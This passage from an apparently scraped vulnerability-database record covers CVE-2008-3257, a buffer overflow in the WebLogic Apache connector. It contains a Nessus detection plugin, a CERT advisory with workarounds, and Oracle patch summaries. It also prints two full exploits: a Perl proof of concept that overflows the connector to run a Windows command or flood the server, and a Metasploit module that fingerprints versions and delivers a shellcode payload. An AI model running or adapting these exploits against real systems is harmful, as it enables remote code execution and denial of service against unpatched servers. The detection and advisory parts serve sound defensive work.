proxy requests from an Apache HTTP server\nto WebLogic. A remote attacker can leverage this issue to execute\narbitrary code on the remote host. \n\nNote that Nessus has not tried to exploit this issue but rather has\nonly checked the affected module's build timestamp. As a result, it\nwill not detect if the remote implements one of the workarounds\npublished by Oracle in its advisory. 
Still, it should be noted that\nthe vendor strongly recommends updating the plug-in.\" );\n script_set_attribute(attribute:\"solution\", value:\n\"Install the latest web server plug-in as described in the vendor\nadvisory above.\" );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Oracle Weblogic Apache Connector POST Request Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_cwe_id(119);\n script_set_attribute(attribute:\"plugin_publication_date\", value: \"2008/08/18\");\n script_cvs_date(\"Date: 2018/08/06 14:03:16\");\nscript_set_attribute(attribute:\"plugin_type\", value:\"remote\");\nscript_set_attribute(attribute:\"cpe\",value:\"cpe:/a:oracle:weblogic_server\");\nscript_set_attribute(attribute:\"exploited_by_nessus\", value:\"true\");\n script_end_attributes();\n\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Web Servers\");\n\n script_copyright(english:\"This script is Copyright (C) 2008-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"http_version.nasl\");\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\n\n\nport = get_http_port(default:80);\nif (!get_port_state(port)) exit(0);\n\n\n# Make sure the banner looks like Apache.\nbanner = get_http_banner(port:port);\nif (\n !banner || \n !egrep(pattern:\"^Server:.*(Apache|Oracle HTTP Server|IBM_HTTP_SERVER|IBM_HTTP_Server)\", string:banner)\n) exit(0);\n\n\n# Iterate over known 
directories.\ndirs = get_kb_list(string(\"www/\", port, \"/content/directories\"));\nif (isnull(dirs)) dirs = make_list(\"\", \"/weblogic\");\n\nforeach dir (dirs)\n{\n # Look for the plug-in and a bridge message.\n url = string(dir, \"/index.jsp\");\n\n res = http_send_recv3(method:\"GET\", item:url, port:port);\n if (res == NULL) exit(0);\n\n # nb: if there's a problem with configured WebLogic server, the initial\n # request results in a bridge message we can use to fingerprint the\n # plug-in. Otherwise, we pass in a special request to \"tickle\" one.\n if (\"X-Powered-By: Servlet\" >< res[1])\n {\n res = http_send_recv3(\n method:\"POST\", \n item:url, \n port:port,\n add_headers:make_array(\"Content-Length\", \"-1\")\n );\n if (res == NULL) exit(0);\n }\n\n # If it's a bridge message from Apache...\n if (\n \"TITLE>Weblogic Bridge Message\" >< res[2] ||\n \"Failure of server APACHE bridge:</H2>\" >< res[2]\n )\n {\n build = \"\";\n change = \"\";\n\n foreach line (split(res[2], keep:FALSE))\n {\n if (\"Build date/time:\" >< line)\n {\n build = strstr(line, \"Build date/time:\") - \"Build date/time:\";\n build = ereg_replace(pattern:\"<[^>]+>\", replace:\"\", string:build);\n build = ereg_replace(pattern:\"^ +\", replace:\"\", string:build);\n }\n if (\"Change Number:\" >< line)\n {\n change = strstr(line, \"Change Number:\") - \"Change Number:\";\n change = ereg_replace(pattern:\"<[^>]+>\", replace:\"\", string:change);\n change = ereg_replace(pattern:\"^ +\", replace:\"\", string:change);\n }\n if (build && change) break;\n }\n\n if (\n build && \n (\n build =~ \"^[A-Za-z]{3} ( |[0-3])[0-9] (1[0-9]{3}|200[0-7]) \" ||\n build =~ \"^(Jan|Feb|Mar|Apr|May|Jun) ( |[0-3])[0-9] 2008 \" ||\n build =~ \"^Jul ( |[01])[0-9] 2008 \"\n )\n )\n {\n if (report_verbosity > 0)\n {\n report = string(\n \"\\n\",\n \"Nessus was able to retrieve the following information about the remote\\n\",\n \"WebLogic plug-in :\\n\",\n \"\\n\",\n \" Plug-in type : Apache\\n\"\n );\n if 
(build)\n {\n report = string(\n report,\n \" Build date/time : \", build, \"\\n\"\n );\n }\n if (change)\n {\n report = string(\n report,\n \" Change number : \", change, \"\\n\"\n );\n }\n if (report_verbosity > 1)\n {\n report = string(\n report,\n \"\\n\",\n \"It is configured to proxy requests such as :\\n\",\n \"\\n\",\n \" \", build_url(port:port, qs:url), \"\\n\"\n );\n }\n security_hole(port:port, extra:report);\n }\n else security_hole(port);\n }\n\n # We've found the plug-in so we're done.\n exit(0);\n }\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "exploitdb": [{"lastseen": "2016-02-01T00:11:39", "bulletinFamily": "exploit", "description": "Bea Weblogic Apache Connector Code Exec / Denial of Service Exploit. CVE-2008-3257. Remote exploit for windows platform", "modified": "2008-07-17T00:00:00", "published": "2008-07-17T00:00:00", "id": "EDB-ID:6089", "href": "https://www.exploit-db.com/exploits/6089/", "type": "exploitdb", "title": "Bea Weblogic Apache Connector - Code Execution / Denial of Service Exploit", "sourceData": "#// Bea Weblogic -- Apache Connector Remote Exploit +-1day\r\n#// Should stack break latest Windows Server 2003 <address space randomization>\r\n#// BIG THANKS TO \r\n#// \"dong-hun you\"(Xpl017Elz) in INetCop - for his paper\r\n#// \"Title: Advanced exploitation in exec-shield (Fedora Core case study)\"\r\n#// His technique works fine against Windows 2003 latest version.\r\n#//\r\n#// The code is broken, since I am chilling out for now\r\n#// SKIDDI BULLETPROOF\r\n#// You may fixup the DoS Code, Windows Code Works on English OSs\r\n#// KingCope -- July/2008\r\n\r\nuse IO::Socket;\r\nuse strict;\r\n\r\n$|=1;\r\nmy $apacheport = 80;\t#// Touch\r\n###\r\nmy $wrongusage = 0;\r\nmy $dodoshost = 0;\r\n\r\n###############################################################################\r\n### Target List Entries |Operating System and Patch Level / Kernel 
Version|\r\n###############################################################################\r\nmy @targets = ();\r\nmy @tgtname = ();\r\nprint \"-\" x 80;\r\n$targets[0] = \"1 Windows Server 2003 Enterprise Edition SP2 RC1 -- English\\n\";\r\n$tgtname[0] = $targets[0];\r\n$targets[100] = \"2 Denial of Service\\n\";\r\n$tgtname[100] = $targets[100];\r\n\r\n###############################################################################\r\n### Print Of Target List And Usage\r\n###############################################################################\r\nprint \"\\n\";\r\n\r\nprint \"Bea Weblogic -- Apache Connector Remote Exploit\\n\\n\";\r\nprint \"Target List:\\n\";\r\n\r\nforeach my $target (@targets) {\t\r\n\tprint $target;\r\n}\r\nprint \"\\n\\n\";\r\nprint \"-\" x 80;\r\nprint \"Usage: perl bea-unlock.pl <hostname or ip> <target>\";\r\nprint \"\\n\";\r\n\r\nprintusage:\r\nif ($wrongusage == 1) {\texit; }\r\n\r\n################################################################################\r\n### Argument Parsing\r\n################################################################################\r\nmy $host = $ARGV[0];\r\nmy $target = $ARGV[1];\r\n\r\nif (($host == \"\") || ($target == \"\")) {\r\n\t$wrongusage = 1;\r\n\tgoto printusage;\r\n}\r\n\r\n################################################################################\r\n### Setup Socket\r\n################################################################################\r\nsetupsocket:\r\nmy $sock = IO::Socket::INET->new(PeerAddr => $host,\r\n \t PeerPort => $apacheport,\r\n \t Proto => 'tcp');\r\nif ($dodoshost == 1) {\r\n\tgoto doshost;\t\r\n}\r\n################################################################################\r\n### Select Target\r\n################################################################################\r\nif ($target == 1) {\r\n\tprint \"Exploiting $host -- \" . 
$tgtname[$target-1];\r\n\tgoto winexpl;\r\n}\r\n\r\nif ($target == 2) {\r\n print \"Attacking Host $host -- Denial of Service -- Wait ...\\n\";\r\n\tgoto doshost;\r\n}\r\n\r\n################################################################################\r\n### Exploitation of Windows Versions\r\n################################################################################\r\nwinexpl:\r\n####WORKS [LOOKUP THE HOSTNAME]\r\nmy $command = \"echo works > c:\\\\desiredfile.txt\";\r\n\t\t\t \r\nmy $cmds = \"cmd.exe /c \\\"$command\\\"|\";\r\n\r\nmy $sc = $cmds;\r\n\r\n#### STACKBREAKING WITH WINEXEC() ON WINDOWS\r\n\r\nmy $c = \"C\" x 97 . pack(\"L\", 0x10013930) x 3 . pack(\"L\", 0x10013930) . pack(\"L\", 0x10013931) . pack(\"L\",0x77EA411E);\r\nmy $a = $cmds . \"A\" x (4000-length($cmds)) . $c;\r\n\r\nprint $sock \"POST /.jsp $a\\r\\nHost: localhost\\r\\n\\r\\n\";\r\n\r\nwhile (<$sock>) {\t\r\n\tprint;\r\n}\r\n################################################################################\r\n### Denial of Service Against The Apache Frontend Module For Bea Weblogic\r\n################################################################################\r\n####NEEDS SOME FIXUP\r\ndoshost:\r\n$dodoshost = 1;\r\n\r\nwhile(1) {\r\n\t$a = \"A\" x 6000;\r\n\tgoto setupsocket;\r\n\tprint $sock \"POST /.jsp $a\\r\\n\\r\\nHost: localhost\\r\\n\\r\\n\";\r\n\twhile(read($sock,$_,100)) {\r\n\t\tmy $dosagain = 0;\r\n\t\t\r\n\t\tif ($dosagain eq 1) {\r\n\t\t\t\t\"Server is down now\\n\";\r\n\t\t\t\texit;\r\n\t\t}\r\n\t\t\r\n\t\tif ($_ =~ /Server/) {\r\n\t\t\tprint \".\";\r\n\t\t\t$dosagain = 1;\r\n\t\t\tnext;\r\n\t\t}\r\n\t}\r\n}\r\n\r\n# milw0rm.com [2008-07-17]\r\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/6089/"}], "cert": [{"lastseen": "2018-12-25T20:18:28", "bulletinFamily": "info", "description": "### Overview \n\nOracle Weblogic (formerly BEA Weblogic) contains a 
vulnerability which can allow a remote, unauthenticated attacker to execute arbitrary code on a vulnerable system. \n\n### Description \n\nOracle Weblogic Server and Weblogic Express application servers can be integrated with the Apache web server using the Weblogic Apache connector plugin (mod_wl). A buffer overflow exists in Weblogic Server and Weblogic Express due to the way that the Apache connector plugin handles specially crafted POST requests. According to [Oracle Security Advisory for CVE-2008-3257](<https://support.bea.com/application_content/product_portlets/securityadvisories/2793.html>):\n\n \n_The following versions of WebLogic Server and WebLogic Express are affected by this vulnerability_ \n \n_ Apache Plug-ins dated prior to July 28 2008 which implies:_ \n\n * _ WebLogic Server 10.0 released through Maintenance Pack 1, on all platforms_\n * _ WebLogic Server 9.2 released through Maintenance Pack 3, on all platforms_\n * _ WebLogic Server 9.1 on all platforms_\n * _ WebLogic Server 9.0 on all platforms_\n * _ WebLogic Server 8.1 released through Service Pack 6, on all platforms_\n * _ WebLogic Server 7.0 released through Service Pack 7 on all platforms_\n * _ WebLogic Server 6.1 released through Service Pack 7 on all platforms_ \n--- \n \n### Impact \n\nA remote, unauthenticated attacker may be able to execute arbitrary code. \n \n--- \n \n### Solution \n\n**Apply a patch** \n \nPatches have been released to address this issue. Refer to [Oracle Security Advisory for CVE-2008-3257](<https://support.bea.com/application_content/product_portlets/securityadvisories/2793.html>) for more information. \n \n--- \n \n**Reconfigure Apache** \n \nAccording to [Oracle Security Advisory for CVE-2008-3257](<https://support.bea.com/application_content/product_portlets/securityadvisories/2793.html>):\n\n_It is possible to configure Apache and avert this vulnerability by rejecting certain invalid requests. 
To do so, add the following parameter to the httpd.conf file and restart Apache:_ \n \n_ LimitRequestLine 4000 _ \n \n**Install the mod_security module** \n \nOracle suggests installing the mod_security module, which is available as open source from <http://www.modsecurity.org/>. \n \nMore information about these workarounds is provided in [Oracle Security Advisory for CVE-2008-3257](<https://support.bea.com/application_content/product_portlets/securityadvisories/2793.html>). \n--- \n \n### Vendor Information\n\n716387\n\nFilter by status: All Affected Not Affected Unknown\n\nFilter by content: __ Vendor has issued information\n\n__ Sort by: Status Alphabetical\n\nExpand all\n\n__ Affected __ Unknown __ Unaffected \n\n**Javascript is disabled. Click here to view vendors.**\n\n### __ Oracle Corporation \n\nUpdated: July 29, 2008 \n\n### Status\n\n__ Vulnerable\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nRefer to [Oracle Security Advisory for CVE-2008-3257](<https://support.bea.com/application_content/product_portlets/securityadvisories/2793.html>) for more information.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23716387 Feedback>).\n\n \n\n\n### CVSS Metrics \n\nGroup | Score | Vector \n---|---|--- \nBase | N/A | N/A \nTemporal | N/A | N/A \nEnvironmental | | N/A \n \n \n\n\n### References \n\n * <https://support.bea.com/application_content/product_portlets/securityadvisories/2793.html>\n * <http://secunia.com/advisories/31146/>\n * <http://milw0rm.com/exploits/6089>\n * <http://www.modsecurity.org/>\n\n### Credit\n\nThis vulnerability was reported by KingCope. \n\nThis document was written by Chris Taschner. 
\n\n### Other Information\n\n**CVE IDs:** | [CVE-2008-3257](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-3257>) \n---|--- \n**Severity Metric:** | 17.33 \n**Date Public:** | 2008-07-21 \n**Date First Published:** | 2008-07-29 \n**Date Last Updated:** | 2008-08-06 16:48 UTC \n**Document Revision:** | 8 \n", "modified": "2008-08-06T16:48:00", "published": "2008-07-29T00:00:00", "id": "VU:716387", "href": "https://www.kb.cert.org/vuls/id/716387", "type": "cert", "title": "Oracle Weblogic Apache connector vulnerable to buffer overflow", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "packetstorm": [{"lastseen": "2016-12-05T22:23:18", "bulletinFamily": "exploit", "description": "", "modified": "2012-05-18T00:00:00", "published": "2012-05-18T00:00:00", "href": "https://packetstormsecurity.com/files/112864/Oracle-Weblogic-Apache-Connector-POST-Request-Buffer-Overflow.html", "id": "PACKETSTORM:112864", "title": "Oracle Weblogic Apache Connector POST Request Buffer Overflow", "type": "packetstorm", "sourceData": "`## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# web site for more information on licensing and terms of use. \n# http://metasploit.com/ \n## \n \nrequire 'msf/core' \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = GreatRanking \n \nHttpFingerprint = { :pattern => [ /Apache/ ] } \n \ninclude Msf::Exploit::Remote::HttpClient \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Oracle Weblogic Apache Connector POST Request Buffer Overflow', \n'Description' => %q{ \nThis module exploits a stack based buffer overflow in the BEA \nWeblogic Apache plugin. \n \nThe connector fails to properly handle specially crafted HTTP POST \nrequests, resulting a buffer overflow due to the insecure usage \nof sprintf. 
Currently, this module works over Windows systems without DEP, \nand has been tested with Windows 2000 / XP. \n \nIn addition, the Weblogic Apache plugin version is fingerprinted with a POST \nrequest containing a specially crafted Transfer-Encoding header. \n}, \n'Author' => \n[ \n'KingCope', # Vulnerability Discovery and PoC \n'juan vazquez', # Metasploit Module \n], \n'Version' => '$Revision: $', \n'References' => \n[ \n[ 'CVE', '2008-3257' ], \n[ 'OSVDB', '47096' ], \n[ 'BID', '30273' ] \n], \n'DefaultOptions' => \n{ \n'EXITFUNC' => 'process', \n}, \n'Privileged' => true, \n'Platform' => 'win', \n'Payload' => \n{ \n'Space' => 4000, \n'BadChars' => \"\\x00\\x0d\\x0a\\x3f\" \n}, \n'Targets' => \n[ \n[ 'Automatic', {} ], \n[ 'BEA WebLogic 8.1 SP6 - mod_wl_20.so / Apache 2.0 / Windows [XP/2000]', \n{ \n'Ret' => 0x10061f63, # push esp # ret # mod_wl_20.so \n'Offset' => 4102 \n} \n], \n[ 'BEA WebLogic 8.1 SP5 - mod_wl_20.so / Apache 2.0 / Windows [XP/2000]', \n{ \n'Ret' => 0x10061473, # push esp # ret # mod_wl_20.so \n'Offset' => 4102 \n} \n], \n[ 'BEA WebLogic 8.1 SP4 - mod_wl_20.so / Apache 2.0 / Windows [XP/2000]', \n{ \n'Ret' => 0x10020e31, # push esp # ret # mod_wl_20.so \n'Offset' => 4102 \n} \n] \n], \n'DisclosureDate' => 'Jul 17 2008', \n'DefaultTarget' => 0)) \n \nregister_options( \n[ \nOptString.new('TARGETURI', [true, 'The URI path to a jsp or object provided by Weblogic', '/index.jsp']), \n], self.class) \n \nend \n \n \ndef check \n \nfingerprint = fingerprint_mod_wl \n \ncase fingerprint \nwhen /Version found/ \nreturn Exploit::CheckCode::Vulnerable \nwhen /BEA WebLogic connector vulnerable/ \nreturn Exploit::CheckCode::Appears \nwhen /BEA WebLogic connector undefined/ \nreturn Exploit::CheckCode::Detected \nwhen /BEA WebLogic connector no vulnerable/, /BEA WebLogic connector not found/ \nreturn Exploit::CheckCode::Safe \nend \n \nend \n \ndef exploit \n \n# Autodetect BEA mod_wl version \nmy_target = get_target \n \n# Avoid the attack if the victim 
doesn't have the same setup we're targeting \nif my_target.nil? \nprint_error(\"BEA mod_weblogic not supported\") \nreturn \nend \n \nuri = target_uri.path \nsploit = rand_text_alphanumeric(my_target['Offset']-uri.length) \nsploit << [my_target.ret].pack(\"V\") \nsploit << payload.encoded \n \nsend_request_cgi({ \n'method' => 'POST', \n'uri' => \"#{uri} #{sploit}\", \n}) \n \nhandler \n \nend \n \ndef get_target \n \nreturn target if target.name != 'Automatic' \n \nfingerprint = fingerprint_mod_wl \n \ncase fingerprint \nwhen /BEA WebLogic 8.1 SP6 - mod_wl_20.so/ \nreturn targets[1] \nwhen /BEA WebLogic 8.1 SP5 - mod_wl_20.so/ \nreturn targets[2] \nwhen /BEA WebLogic 8.1 SP4 - mod_wl_20.so/ \nreturn targets[3] \nelse \nreturn nil \nend \n \nend \n \ndef fingerprint_mod_wl \n \nmy_data = rand_text_alpha(rand(5) + 8) \nres = send_request_cgi( \n{ \n'method' => 'POST', \n'uri' => target_uri.path, \n'headers' => \n{ \n'Transfer-Encoding' => my_data \n}, \n'data' => \"#{my_data.length}\\r\\n#{my_data}\\r\\n0\\r\\n\", \n}) \n \nif res and res.code == 200 and res.body =~ /Weblogic Bridge Message/ \n# BEA WebLogic 8.1 SP6 - mod_wl_20.so \ncase res.body \nwhen (/Build date\\/time:<\\/B> <I>Jun 16 2006 15:14:11/ and /Change Number:<\\/B> <I>779586/) \nreturn \"Version found: BEA WebLogic 8.1 SP6 - mod_wl_20.so\" \n# BEA WebLogic 8.1 SP5 - mod_wl_20.so \nwhen (/Build date\\/time:<\\/B> <I>Aug 5 2005 11:19:57/ and /Change Number:<\\/B> <I>616810/) \nreturn \"Version found: BEA WebLogic 8.1 SP5 - mod_wl_20.so\" \nwhen (/Build date\\/time:<\\/B> <I>Oct 25 2004 09:25:23/ and /Change Number:<\\/B> <I>452998/) \nreturn \"Version found: BEA WebLogic 8.1 SP4 - mod_wl_20.so\" \n# Check for dates prior to patch release \nwhen /([A-Za-z]{3} [\\s\\d]{2} [\\d]{4})/ \nbuild_date = Date.parse($1) \nif build_date <= Date.parse(\"Jul 28 2008\") \nreturn \"BEA WebLogic connector vulnerable\" \nelse \nreturn \"BEA WebLogic connector no vulnerable\" \nend \nelse \nreturn \"BEA WebLogic connector 
undefined\" \nend \nend \n \nreturn \"BEA WebLogic connector not found\" \n \nend \n \nend \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/112864/bea_weblogic_post_bof.rb.txt", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "oracle": [{"lastseen": "2018-08-31T04:14:04", "bulletinFamily": "software", "description": "A Critical Patch Update is a collection of patches for multiple security vulnerabilities. It also includes non-security fixes that are required (because of interdependencies) by those security patches. Critical Patch Updates are cumulative, except as noted below, but each advisory describes only the security fixes added since the previous Critical Patch Update. Thus, prior Critical Patch Update Advisories should be reviewed for information regarding earlier accumulated security fixes. Please refer to\n\nCritical Patch Updates and Security Alerts for information about Oracle Security Advisories.\n\nDue to the threat posed by a successful attack, Oracle strongly recommends that customers apply fixes as soon as possible. This Critical Patch Update contains 36 new security fixes across all products.\n", "modified": "2009-09-03T00:00:00", "published": "2008-10-14T00:00:00", "id": "ORACLE:CPUOCT2008-100299", "href": "", "title": "CPUOct2008 Advisory", "type": "oracle", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T04:14:01", "bulletinFamily": "software", "description": "A Critical Patch Update is a collection of patches for multiple security vulnerabilities. It also includes non-security fixes that are required (because of interdependencies) by those security patches. Critical Patch Updates are cumulative, except as noted below, but each advisory describes only the security fixes added since the previous Critical Patch Update. 
Thus, prior Critical Patch Update Advisories should be reviewed for information regarding earlier accumulated security fixes. Please refer to\n\nCritical Patch Updates and Security Alerts for information about Oracle Security Advisories.\n\nDue to the threat posed by a successful attack, Oracle strongly recommends that customers apply fixes as soon as possible. This Critical Patch Update contains 41 new security fixes across all products.\n", "modified": "2009-09-03T00:00:00", "published": "2009-01-13T00:00:00", "id": "ORACLE:CPUJAN2009-097901", "href": "", "title": "CPU Jan 2009", "type": "oracle", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}